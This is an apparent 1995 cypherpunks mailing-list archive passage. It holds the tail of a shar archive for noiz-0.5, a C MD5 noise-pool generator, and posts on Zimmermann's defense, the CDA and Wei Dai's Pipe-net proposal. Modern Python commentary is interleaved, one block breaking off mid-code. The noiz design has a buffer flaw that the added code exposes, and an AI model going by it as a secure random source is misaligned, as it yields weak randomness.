X		0000120  5051 5253 5455 5657 5859 5a5b 5c5d 5e5f
X		0000140  6061 6263 6465 6667 6869 6a6b 6c6d 6e6f
X		0000160  7071 7273 7475 7677 7879 7a7b 7c7d 7e7f
X		0000200  8081 8283 8485 8687 8889 8a8b 8c8d 8e8f
X		0000220  9091 9293 9495 9697 9899 9a9b 9c9d 9e9f
X		0000240  a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf
X		0000260  b0b1 b2b3 b4b5 b6b7 b8b9 babb bcbd bebf
X		0000300  c0c1 c2c3 c4c5 c6c7 c8c9 cacb cccd cecf
X		0000320  d0d1 d2d3 d4d5 d6d7 d8d9 dadb dcdd dedf
X		0000340  e0e1 e2e3 e4e5 e6e7 e8e9 eaeb eced eeef
X		0000360  f0f1 f2f3 f4f5 f6f7 f8f9 fafb fcfd feff
X		0000400
X		gwarn#
Xso stir it,	gwarn#
Xwith some	gwarn#
Xrandom input	gwarn#
X		gwarn# noizspin | noizstir
X		gwarn# od -x /etc/noiz
X		0000000  b695 3c73 7a0c 73e0 b37b 55f5 e6cf 2dec
X		0000020  1fa7 1544 890e a039 6a21 e2ec 4669 35ea
X		0000040  a9d8 1175 0dd9 9742 fd6a 1501 9039 1d73
X		0000060  2b0e 0864 93e8 63bf 4a63 3398 b63c ef77
X		0000100  2534 cd7e 0e79 fb56 5f53 bcc5 5b68 968d
X		0000120  910e bbf4 e222 03b2 13d8 908c e508 74a8
X		0000140  d056 fb99 ea7f dddb 9b2f c654 4cd0 1384
X		0000160  8899 3507 1dbb c367 43f1 9806 17e0 8780
X		0000200  95f7 af5a 7a78 92e0 126c 4f2d 3721 a5ee
X		0000220  4a12 f7c3 3186 febb 3ea8 f048 4fd1 41b8
X		0000240  812f 1d43 66a7 8e2d 7ca4 cddb 39c6 6b5f
X		0000260  9a8c 646b c511 304b eb9b b235 46da 5d2e
X		0000300  ec53 5816 c742 e92d 2468 8579 302d d932
X		0000320  2f45 03fb 4f2c ff10 b84d 15a5 8e46 8e84
X		0000340  ff12 0d68 26a3 10c2 87b5 4ebc 3b59 afa2
X		0000360  2bb2 bb64 371e 2f99 b108 c7d5 42eb 68c9
X		gwarn#
X		gwarn#
Xnow emit some 	gwarn#
X16-byte		gwarn#
Xhigh-entropy	gwarn#
Xoutput and 	gwarn#
Xdisplay it	gwarn#
Xwith od -x	gwarn#
X		gwarn# noizspin | noizout | od -x
X		0000000  be7b 81f9 744c 2dca e36d a6c6 9394 7bf2
X		0000020
X		gwarn# noizspin | noizout | od -x
X		0000000  1cea b243 2b0e 55c3 7630 886c 3be3 d03f
X		0000020
X		gwarn# noizspin | noizout | od -x
X		0000000  6887 864d b4fc 40e6 7eb1 0d9e 6b47 f148
X		0000020
X		gwarn#
Xdemonstrate	gwarn#
Xhigh-entropy	gwarn#
Xoutput even	gwarn#
Xwithout noise	gwarn#
Xinput and 	gwarn#
Xwithout 	gwarn#
Xstirring	gwarn#
X		gwarn#
X		gwarn# noizout < /dev/null | od -x
X		0000000  e54f 67a6 52ec 3d61 ddfd 1208 5f52 fead
X		0000020
X		gwarn# noizout < /dev/null | od -x
X		0000000  6472 5f9e fe81 fcab bca8 6d22 2400 0d0a
X		0000020
X		gwarn# noizout < /dev/null | od -x
X		0000000  2df4 9d73 ddc2 5aa4 10c6 59b8 e31c efda
X		0000020
X		gwarn# noizout < /dev/null | od -x
X		0000000  7f64 6671 957e b4aa ae4b 8fd8 7e90 601e
X		0000020
X		gwarn# noizout < /dev/null | od -x
X		0000000  2d8e 522c 700a 5367 d67f dae3 0977 0689
X		0000020
X
X
X
XALGORITHMS
X
X   Let the syntax X[i..j] represent a subrange of an array X.
X   Let the syntax X[] represent the entire array X.
X
X   Let the array Noiz[0..15][0..15] represent the 256 bytes of /etc/noiz
X   Let the array Noiz[r] represent the rth row (16 bytes) of Noiz
X
X   Let the array Input[] represent bytes read from standard input
X
X   Let the syntax  MD5( x, y, z... )  represent the MD5 hash of the 
X   concatenation of the arguments x, y, z...
X
X
X
X   Algorithm of "noizstir":
X
X	read Noiz[][] from /etc/noiz
X
X	read Input[] from standard input
X
X	In_hash[0..15] := MD5(  Noiz[][], 
X				Input[],
X				time, 
X				pid,
X				ppid,
X				and some extra stuff from sloppy buffering
X			     );
X
X	FOR r := 0 TO 15
X
X	    Out_hash[0..15] := MD5(	Noiz[r],
X					In_hash[0..15],
X					In_hash[0..r]
X	    		   	  );
X
X	    Noiz[r] := Noiz[r] BITWISE_XOR Out_hash[];
X
X	NEXT r
X
X	write Noiz[][] to /etc/noiz
X
X
X
X   Algorithm of "noizout"
X
X	read Noiz[][] from /etc/noiz
X
X	read Input[] from standard input
X
X	Out_hash[0..15] := MD5(  Noiz[][], 
X				 Input[],
X				 time, 
X				 pid,
X				 ppid,
X				 and some extra stuff from sloppy buffering
X			      );
X
X  	write Out_hash[] to standard output 
X
X
X
X
XEND $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/noiz.doc,v 1.6 95/02/07 15:35:37 strick Exp Locker: strick $
END_OF_FILE
if test 9532 -ne `wc -c <'noiz.doc'`; then
    echo shar: \"'noiz.doc'\" unpacked with wrong size!
fi
# end of 'noiz.doc'
fi
if test -f 'noiz.h' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'noiz.h'\"
else
echo shar: Extracting \"'noiz.h'\" \(395 characters\)
sed "s/^X//" >'noiz.h' <<'END_OF_FILE'
X/* 	noiz.h
X
X	Anticopyright (A) 1995 Henry Strickland <strick@yak.net> 
X
X        This package is placed this package in the public domain.
X
X        Because this package is free, there is no warranty
X        for it whatsoever.  Caveat hacker.
X*/
X
X
X
X
X#define	NOIZ_FILE	"/etc/noiz"
X
X
X/* END $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/noiz.h,v 1.2 95/02/07 14:19:52 strick Exp Locker: strick $ */
END_OF_FILE
if test 395 -ne `wc -c <'noiz.h'`; then
    echo shar: \"'noiz.h'\" unpacked with wrong size!
fi
# end of 'noiz.h'
fi
if test -f 'noizinit.c' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'noizinit.c'\"
else
echo shar: Extracting \"'noizinit.c'\" \(767 characters\)
sed "s/^X//" >'noizinit.c' <<'END_OF_FILE'
X/*      noizinit.c
X
X        Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X
X        This package is placed this package in the public domain.
X
X        Because this package is free, there is no warranty
X        for it whatsoever.  Caveat hacker.
X*/
X
X
X/*
X	This file noizinit.c is dedicated to Richard Stallman,
X	who taught me the joy of free software.
X*/
X
X
X#include <stdio.h>
X#include "noiz.h"
X
Xmain()
X{
X	int e;
X	int i;
X
X	FILE* f= fopen( NOIZ_FILE, "w" );
X	if (!f) goto bad;
X
X	for ( i=0; i<256; i++ ) {
X		e= putc(i,f);
X		if (e==EOF) goto bad;
X	}
X
X	e= fclose(f);
X	if ( e!=0 ) goto bad;
X
X	return 0;
X
Xbad:
X	perror( NOIZ_FILE );
X	exit(255);
X}
X
X/* END $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/noizinit.c,v 1.3 95/02/07 15:28:59 strick Exp Locker: strick $ */
END_OF_FILE
if test 767 -ne `wc -c <'noizinit.c'`; then
    echo shar: \"'noizinit.c'\" unpacked with wrong size!
fi
# end of 'noizinit.c'
fi
if test -f 'noizout.c' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'noizout.c'\"
else
echo shar: Extracting \"'noizout.c'\" \(1559 characters\)
sed "s/^X//" >'noizout.c' <<'END_OF_FILE'
X/*      noizstir.c   -- stir the noise file with stdin
X
X        Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X
X        This package is placed this package in the public domain.
X
X        Because this package is free, there is no warranty
X        for it whatsoever.  Caveat hacker.
X*/
X
X
X/* 
X	This file noizout.c is dedicated in memory of John Cage,
X	who explained to me the point of his pointless noise. 
X*/
X
X
X
X#include <stdio.h>
X#include "noiz.h"
X#include "md5.h"
X
Xchar noiz[256];
Xchar pad[256];
X
Xunsigned char out_hash[16];
X
Xstruct MD5Context context;
X
Xmain()
X{
X	int e;
X	int i;
X	long seconds;
X	long pid;
X	long ppid;
X	int row;
X
X	FILE* f= fopen( NOIZ_FILE, "r" );
X	if (!f) goto bad;
X
X	for ( i=0; i<256; i++ ) {
X		e= getc(f);
X		if (e==EOF) goto bad;
X		noiz[i]= e;
X	}
X
X	MD5Init( &context );
X	MD5Update(&context, (unsigned char*) &noiz, 256);
X	while ( fread(pad, 1, 256, stdin) > 0 ) {
X		MD5Update(&context, (unsigned char*) &pad, 256);
X	}
X	time( &seconds );
X	pid= getpid();
X	ppid= getppid();
X	MD5Update( &context, (unsigned char*) &seconds, sizeof seconds );
X	MD5Update( &context, (unsigned char*) &pid, sizeof pid );
X	MD5Update( &context, (unsigned char*) &ppid, sizeof ppid );
X	MD5Final( out_hash, &context );
X
X	for ( i=0; i<16; i++ ) {
X		e= putchar(out_hash[i]);
X		if (e==EOF) goto bad;
X	}
X
X	e= fflush(stdout);
X	if (e==EOF) goto bad;
X	e= fclose(stdout);
X	if (e==EOF) goto bad;
X
X	return 0;
Xbad:
X	perror( NOIZ_FILE );
X	exit(255);
X}
X
X/* END $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/noizout.c,v 1.3 95/02/07 15:29:00 strick Exp Locker: strick $ */
END_OF_FILE
if test 1559 -ne `wc -c <'noizout.c'`; then
    echo shar: \"'noizout.c'\" unpacked with wrong size!
fi
# end of 'noizout.c'
fi
if test -f 'noizspin.c' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'noizspin.c'\"
else
echo shar: Extracting \"'noizspin.c'\" \(729 characters\)
sed "s/^X//" >'noizspin.c' <<'END_OF_FILE'
X/*      noizspin.c
X
X        Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X
X        This package is placed this package in the public domain.
X
X        Because this package is free, there is no warranty
X        for it whatsoever.  Caveat hacker.
X*/
X
X/*
X	This file noizspin.c is dedicated to Matt Blaze,
X	because I learned the trick from his code.
X*/
X
X
X#include <stdio.h>
X#include <sys/types.h>
X#include <signal.h>
X
Xunsigned long x;
X
Xenough()
X{
X	printf("%lu\n", x );
X	fflush(stdout);
X	exit(0);
X}
X
Xmain()
X{
X	signal( SIGALRM, enough );
X	alarm(1);
X
X	while (1) {
X		++x;
X	}
X
X	/*NOTREACHED*/
X	return 255;
X}
X
X/* END $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/noizspin.c,v 1.1 95/02/07 15:35:39 strick Exp Locker: strick $ */
END_OF_FILE
if test 729 -ne `wc -c <'noizspin.c'`; then
    echo shar: \"'noizspin.c'\" unpacked with wrong size!
fi
# end of 'noizspin.c'
fi
if test -f 'noizstir.c' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'noizstir.c'\"
else
echo shar: Extracting \"'noizstir.c'\" \(1841 characters\)
sed "s/^X//" >'noizstir.c' <<'END_OF_FILE'
X/*      noizstir.c   -- stir the noise file with stdin
X
X        Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X
X        This package is placed this package in the public domain.
X
X        Because this package is free, there is no warranty
X        for it whatsoever.  Caveat hacker.
X*/
X
X
X/*
X	This file noizstir.c is dedicated to Jacques Atali,
X	in honor of his book "Noise, The Political Economy
X	of Music."
X*/
X
X
X#include <stdio.h>
X#include "noiz.h"
X#include "md5.h"
X
Xchar noiz[256];
Xchar pad[256];
X
Xunsigned char in_hash[16];
Xunsigned char out_hash[16];
X
Xstruct MD5Context context;
X
Xmain()
X{
X	int e;
X	int i;
X	long seconds;
X	long pid;
X	long ppid;
X	int row;
X
X	FILE* f= fopen( NOIZ_FILE, "r+" );
X	if (!f) goto bad;
X
X	for ( i=0; i<256; i++ ) {
X		e= getc(f);
X		if (e==EOF) goto bad;
X		noiz[i]= e;
X	}
X
X	MD5Init( &context );
X	MD5Update(&context, (unsigned char*) &noiz, 256);
X	while ( fread(pad, 1, 256, stdin) > 0 ) {
X		MD5Update(&context, (unsigned char*) &pad, 256);
X	}
X	time( &seconds );
X	pid= getpid();
X	ppid= getppid();
X	MD5Update( &context, (unsigned char*) &seconds, sizeof seconds );
X	MD5Update( &context, (unsigned char*) &pid, sizeof pid );
X	MD5Update( &context, (unsigned char*) &ppid, sizeof ppid );
X	MD5Final( in_hash, &context );
X
X	for (row=0; row<16; row++ ) {
X		MD5Init( &context );
X		MD5Update( &context, noiz+16*row, 16 );
X		MD5Update( &context, in_hash, 16 );
X		MD5Update( &context, in_hash, row+1 );
X		MD5Final( out_hash, &context );
X		for ( i=0; i<16; i++ ) {
X			noiz[16*row+i] ^= out_hash[i];
X		}
X	}
X
X	fflush(f);
X	rewind(f);
X	
X	for ( i=0; i<256; i++ ) {
X		e= putc(noiz[i],f);
X		if (e==EOF) goto bad;
X	}
X
X	e= fclose(f);
X	if (e==EOF) goto bad;
X
X	return 0;
X
Xbad:
X	perror( NOIZ_FILE );
X	exit(255);
X}
X
X/* END $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/noizstir.c,v 1.3 95/02/07 15:29:01 strick Exp Locker: strick $ */
END_OF_FILE
if test 1841 -ne `wc -c <'noizstir.c'`; then
    echo shar: \"'noizstir.c'\" unpacked with wrong size!
fi
# end of 'noizstir.c'
fi
if test -f 'patchlevel' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'patchlevel'\"
else
echo shar: Extracting \"'patchlevel'\" \(2 characters\)
sed "s/^X//" >'patchlevel' <<'END_OF_FILE'
X0
END_OF_FILE
if test 2 -ne `wc -c <'patchlevel'`; then
    echo shar: \"'patchlevel'\" unpacked with wrong size!
fi
# end of 'patchlevel'
fi
if test -f 'version' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'version'\"
else
echo shar: Extracting \"'version'\" \(9 characters\)
sed "s/^X//" >'version' <<'END_OF_FILE'
Xnoiz-0.5
END_OF_FILE
if test 9 -ne `wc -c <'version'`; then
    echo shar: \"'version'\" unpacked with wrong size!
fi
# end of 'version'
fi
echo shar: End of shell archive.
exit 0
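
The pool update in noizstir.c and the output hash in noizout.c above, modelled in Python as an added example; it is not part of the noiz-0.5 package or its author's code. It assumes an 8-byte little-endian `long`, uses constructed time/pid values and inputs, and `absorb_exact` is a hypothetical hardened read loop shown beside the posted one.

```python
import hashlib
import struct

POOL_SIZE = 256  # noizinit.c writes the bytes 0..255 to NOIZ_FILE
PAD_SIZE = 256   # size of pad[] in noizstir.c and noizout.c


def initial_pool() -> bytes:
    """Pool contents right after noizinit."""
    return bytes(range(POOL_SIZE))


def absorb_as_posted(md5, data: bytes) -> None:
    """Model of: while (fread(pad,1,256,stdin) > 0) MD5Update(&context, pad, 256);

    pad[] is a zero-initialised global that is never cleared, and all 256
    bytes are hashed even when the last read is short.
    """
    pad = bytearray(PAD_SIZE)
    for off in range(0, len(data), PAD_SIZE):
        piece = data[off:off + PAD_SIZE]
        pad[:len(piece)] = piece          # the tail keeps the previous chunk
        md5.update(bytes(pad))


def absorb_exact(md5, data: bytes) -> None:
    """Hypothetical hardened variant: hash only what was read, plus its length."""
    md5.update(data)
    md5.update(struct.pack("<Q", len(data)))


def input_hash(pool, data, seconds, pid, ppid, absorb=absorb_as_posted) -> bytes:
    """MD5(pool, stdin, time, pid, ppid): in_hash in noizstir, the output of noizout."""
    md5 = hashlib.md5()
    md5.update(pool)
    absorb(md5, data)
    # Assumption: `long` is 8 bytes, little-endian; the C code hashes raw longs.
    for value in (seconds, pid, ppid):
        md5.update(struct.pack("<q", value))
    return md5.digest()


def noizout(pool, data, seconds, pid, ppid) -> bytes:
    """noizout.c: emit 16 bytes; the pool file is only read, never rewritten."""
    return input_hash(pool, data, seconds, pid, ppid)


def stir(pool, data, seconds, pid, ppid, absorb=absorb_as_posted) -> bytes:
    """noizstir.c: XOR each 16-byte row with MD5(row, in_hash, in_hash[0..row])."""
    in_hash = input_hash(pool, data, seconds, pid, ppid, absorb)
    new_pool = bytearray(pool)
    for row in range(16):
        md5 = hashlib.md5()
        md5.update(pool[16 * row:16 * row + 16])
        md5.update(in_hash)
        md5.update(in_hash[:row + 1])
        for i, byte in enumerate(md5.digest()):
            new_pool[16 * row + i] ^= byte
    return bytes(new_pool)


def demo() -> dict:
    pool = initial_pool()
    when = dict(seconds=792201600, pid=1234, ppid=1)   # constructed values
    short = b"A" * 266                                 # constructed inputs that
    longer = b"A" * 276                                # differ only in length
    stirred = stir(pool, short, **when)
    return {
        "rows_changed": sum(stirred[16 * r:16 * r + 16] != pool[16 * r:16 * r + 16]
                            for r in range(16)),
        "posted_collides": stirred == stir(pool, longer, **when),
        "exact_collides": stir(pool, short, absorb=absorb_exact, **when)
                          == stir(pool, longer, absorb=absorb_exact, **when),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

With the posted read loop the two inputs leave the pool in the same state, because the stale tail of pad[] stands in for the bytes that were never read; hashing only the bytes read, plus their count, keeps them distinct.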




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip L. Dubois" <dubois@csn.org>
Date: Tue, 7 Feb 95 15:00:31 PST
To: cypherpunks@toad.com
Subject: Zimmermann
Message-ID: <199502072300.AA20868@teal.csn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Many of you know that members of Philip Zimmermann's
defense team traveled recently to San Jose to meet with
the Assistant U.S. Attorney (AUSA) assigned to the
Zimmermann investigation.  This was done for the purpose of
persuading the AUSA not to indict.  In the hope of avoiding
speculation and misinformation, I write now to report that the
meeting was cordial, that the AUSA listened carefully and
agreed to consider our arguments, and that we don't know when
a decision will be made.

The defense effort continues and remains in need of
financial support.  Before the trip to San Jose, one
generous person donated a plane ticket from his own
frequent-flyer miles.  This contribution was timely and
much appreciated and shows a way for people to
contribute without digging into their pocketbooks.
More travel will be necessary during the next month or
two, and if there is an indictment, a great deal of
travel will be necessary.  Any new contributions,
including plane tickets, will be received with gratitude.

It may seem odd, given the nature of the case, that the
defense effort does not have its own Web page, ftp
site, or other electronically-accessible source of
information.  Keep in mind that you're dealing with a
lawyer who tends not to do things without considerable
deliberation.  The investigation has only been going on
for two years.  I'm working on it.

Government investigators may seek to interview people.
It would be helpful to us to hear from such people.
The government is not required to, and will not, tell
us what its up to.  Our only source of information is
people whove been questioned.  There is nothing wrong
with such folks telling us about their interviews, and
it helps us a great deal.  I therefore ask that anyone who has
been approached and/or interviewed by any federal investigator
about Mr. Zimmermann contact me.  My email is dubois@csn.org,
my phone is 303-444-3885, and my mail address is 2305
Broadway, Boulder, CO, 80304-4132.

Ill close by offering thanks.  Mr. Zimmermann and I
very much appreciate the warm reception we were
accorded by the Cypherpunks while we were in
California.  And we are deeply grateful for all your
generous contributions of financial and other support.
Your appreciation of the importance of Mr. Zimmermann's
case to the wider causes of privacy and individual
liberty is encouraging.

Philip L. Dubois
Lawyer for Philip Zimmermann

-----BEGIN PGP SIGNATURE-----
Version: 2.7

iQCVAwUBLze+ebZ7C+AHeDONAQGJbgP9EMCSSQa0nEx2Tyb15IRei4JT3snpui1p
nwrfmeXHLMawsXeUqCbsrZPgo6CJMHryiy/2dAMc+jc4KwUSuNudWZ9wbPGWALUg
PNKlfpGi/3i7Fa+sE/RcR32PQ3vXixk6vYNHMV/mx/ZpjV4pLb31UgHhnjgDuKjv
73t8Klg8D6I=
=lQdU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjwohler@netcom.com (Marc Wohler)
Date: Tue, 7 Feb 95 16:16:53 PST
To: cypherpunks@toad.com (Cypher Punks)
Subject: NYC CPUNKS MEET
Message-ID: <199502080013.QAA13710@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Attn.: New York City area Cypherpunks

NYC C'punks meeting:

Sat Feb 11, 3:00 P.M., at the home of Linn & Barbara  Stanton
315 West 106 Street  Apt 2A 
(Between West End Ave & Riverside Drive)
212-316-1958.

Once again the gracious Stantons invite local area Cpunks to
their lovely home which is smoke free and feline friendly.

The agenda is still open and suggestions can be made to
mjwohler@netcom.com
or phone Marc Wohler @ 212-362-0690. Let me know if you plan to
attend.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy+PL2eikzgqLB7pAQGHigP9HW1Py30O2fcZH/f1SAOToOBZYVZMiB9c
buGQrujaicGVJlvGb1Le/OjJ872JB69BQD1MMsemABSYi4swL15w9qj1rhoTAHIg
yTRDFJD16g1lqqLvEJZ0RijOh1dXLaUg8HNue0JoSAbARkQed8I3+mklP4C4saYn
qW2Fa/kDuZY=
=Rl9C
-----END PGP SIGNATURE-----

-- 
                                              Marc J. Wohler   
                                             mjwohler@netcom.com
***Preserve, Protect and Defend the private use of Strong Crypto***
                 * * * PGP for the masses * * * 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Tue, 7 Feb 95 13:40:58 PST
To: cypherpunks@toad.com
Subject: Child Porno
Message-ID: <Pine.SUN.3.91.950207163815.7583A-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just heard on the radio "How child pornographers are using the 'Net to 
turn your home computer into their playground and why you can't do 
anything because of lax and permissive legislation."

All this over some very discordant chords to make it seem more ominous.  
Gotta love the evening news here in CT.

From the same people that had a feature of 'Martial arts weapons as 
weapons of mass destruction and how easy they are to get.'  I wonder if 
the producer is a closet fascist or a ratings freak.

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Tue, 7 Feb 95 16:58:57 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Seals and Sealing Waxes
In-Reply-To: <ab5d0f8b040210047448@DialupEudora>
Message-ID: <9502080056.AA14295@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> "All crypto is economics," and this is what made seals and sealing wax so
> useful for so long. Saying "seals were duplicatable from the start" does
> not mean this feat was easy, even if technically possible.
> 
> In fact, the fine details produced by a good seal are hard to exactly
> emulate with a copy. Even on a two-dimensional surface. And with the advent
> of three-dimensional surfaces, which sealing wax made possible, the fine
> detail of a good seal was in fact very hard to forge.
> 
> Not impossible, but very costly with the technology of the day. Or even the
> technology of _today_. After all, paper currency is largely based on seal
> technology, with various embossing, printing, etc. methods used (on special
> paper) that remain fairly hard to duplicate.

The House Banking, Finance and Urban Affairs Committee last year held
hearings on the redesign of the U.S. currency.  Some of the testimony
about physical document security was pretty interesting (for those
with the requisite proclivities).  I only have a hardcopy, though if
enough people are interested, I might be persuaded to scan some of it
in.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Tue, 7 Feb 95 17:17:10 PST
To: skaplin@mirage.skypoint.com>
Subject: RE: Effects of S.314 (Communications Decency Act)
Message-ID: <Chameleon.4.01.950207171644.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>I just had an interesting conversation with a person who works for an ISP.
>Basically their response if S.314 becomes law will be to preprocess all
>incoming mail. If it is uuencoded or encrypted, into the bit bucket it will
>go. They are still thinking about what to do with telnet and ftp.

Sounds like a good application for text stego...

>This is starting to get very scary.

Indeed.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov
WWW:                     ftp://ftp.netcom.com/pub/jc/jcorgan/home.html


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzgbVU1Diok8GKihAQEfJgQAiDd5ha7WCURlwepHgV8qjBYjoT1MxLsF
219ymsRNe/U0bJwSTgt/sBqNjZIS3aQjEQIu+VE3CivvNcVYz0wuZ5KYVf5IADpF
4qtba3bZwENJNjOm9Y/w2m2mWAkEK0I77IPPFdCts0xg6sWWMOVOv4ry2eOQ59uQ
WvTIH1omb58=
=srzZ
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 7 Feb 95 14:16:43 PST
To: cypherpunks@toad.com
Subject: Re: CFP, Cypherpunks, and Crypto
Message-ID: <9502072215.AA20605@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May says:
...
>The Computers, Freedom, and Privacy Conference is to be held 29-31
>March 1995, at the Marriott in Burlingame, CA (SF Airport). Details
>have been distributed recently to most of the usual places.
>
>I'll be on Michael Froomkin's "Crypto" panel on Friday, 31 March.
>Along with Stewart Baker (ex-NSA, famous for "Clipper opponents just
>getting revenge for missing Woodstock"), Steve Walker (TIS), Phil
>Karn, a Microsoft guy, and maybe others. Details should be available.
>

While we're at it, let me put in a plug for my tutorial, "Everything
you need to know to argue about cryptography", to be held Tuesday
afternoon (March 28) as part of the pre-conference tutorial track.
Spread the word...

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Tue, 7 Feb 95 17:32:30 PST
To: cypherpunks@toad.com
Subject: a new way to do anonymity
Message-ID: <199502080132.AA26151@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A week ago I made a suggestion for a new protocol for untraceability, 
but only got one response.  I'll try again, this time more 
forcefully.  I'm not trying to convince anyone to implement this 
(though of course you're welcome to!), but just to think about it and 
give me feedback.

Why is another protocol needed?  Right now we have only two, 
each of which has its own set of tradeoffs.  To summarize:

	Mix-Net (i.e., remailer-net): high latency, moderate bandwidth 
		costs, and low complexity
	DC-Net: moderate latency, high bandwidth costs, and high complexity

While the DC-Net will probably never be widely used, the remailer-net 
has a fair chance of one day providing a way for many people to send 
e-mail that not even governments can trace.  However, I don't think this 
is enough.  Efficient social and business relationships require that 
people be able to converse with each other in real time.  Cryptoanarchy 
will not come about if people cannot do this anonymously.  How well can 
two pseudonymous agents negotiate a contract if each message they send 
must be delayed several hours?  The protocol I suggested would have low 
latency, moderate bandwidth costs, and moderate complexity.  It would be 
well suited for people to interact anonymously in a textual environment.

This is what I wrote:
> Imagine a server that allows you to open a 
> low bandwidth (let's say around 100 cps, in order to reduce costs)
> link-encrypted telnet session with it, and provides you with a number 
> of services, for example a link-encrypted talk session with another 
> user.  You'll need to maintain the link 24 hours a day to defend 
> against statistical analysis, and of course you can chain a number of 
> these servers together in a way similar to chaining remailers.

Lance pointed out the chain cannot be built quickly.  This is not a problem
if servers connect to each other with relatively wide link-encrypted pipes
and multiplex your connection into these pipes.

In this system, latency would never be more than a few seconds, bandwidth
cost is N*100 cps (point to point), N being the number of links in your chain.
Implementation would probably be harder than remailers, but much easier
than DC-Nets.  The protocol would also provide both sender and receiver
untraceability without any need for broadcasting.

Wei Dai

P.S. I never gave a name for the protocol... let's call it Pipe-net.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzgewDl0sXKgdnV5AQGzvAQAgFaOxOzFPgS031z4jZRYUJp/+3BS5Con
Kza7WsvZPvxzaNLh9ecD3aCx5dtf4muaiUKjC2HIItaLKEdZZPdzUGFd4wg1cY8G
k8mvYNzDImr3ZtQ0HiqQ59PWhznad0GuhjQajB7RtpI+K/Z4uBaUEZGVoZZT+LHN
MSjOl/k/yfg=
=jgq6
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?
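
A small simulation of the constant-rate chained link described in the post above, added here as an illustration; it is not code from Wei Dai or from any Pipe-net implementation. The 10-byte cell, the 10 cells per second (chosen to give the post's 100 cps) and the length-byte framing are assumptions, and link encryption is assumed rather than modelled.

```python
from collections import deque

CELL_PAYLOAD = 10    # assumption: user bytes carried per cell
CELLS_PER_SEC = 10   # assumption: 10 cells/s x 10 bytes = the post's 100 cps
CELL_SIZE = 1 + CELL_PAYLOAD  # 1 length byte + payload, always padded to full size


def build_cell(items) -> bytes:
    """Frame up to CELL_PAYLOAD queued bytes; the rest of the cell is padding."""
    payload = bytes(b for _, b in items)
    return bytes([len(payload)]) + payload + bytes(CELL_PAYLOAD - len(payload))


def open_cell(cell: bytes) -> bytes:
    """Receiver side: strip the length byte and the padding."""
    return cell[1:1 + cell[0]]


def run_chain(schedule, hops, ticks):
    """Simulate `hops` constant-rate links in series for `ticks` cell slots.

    schedule maps a tick number to the bytes the user types at that tick.
    Returns (wire, delivered, worst_delay_ticks), where wire is what an
    observer of the first link sees: one (tick, size) pair per slot.
    Link encryption is assumed, so the observer cannot read the length byte.
    """
    queues = [deque() for _ in range(hops)]
    wire, delivered, worst = [], bytearray(), 0
    for t in range(ticks):
        queues[0].extend((t, b) for b in schedule.get(t, b""))
        # Walk the chain from the far end so data advances one hop per tick.
        for h in reversed(range(hops)):
            n = min(len(queues[h]), CELL_PAYLOAD)
            items = [queues[h].popleft() for _ in range(n)]
            cell = build_cell(items)          # sent even when items is empty
            if h == 0:
                wire.append((t, len(cell)))
            if h + 1 < hops:
                queues[h + 1].extend(items)   # next server re-frames the data
            else:
                delivered += open_cell(cell)
                for t0, _ in items:
                    worst = max(worst, t - t0 + 1)
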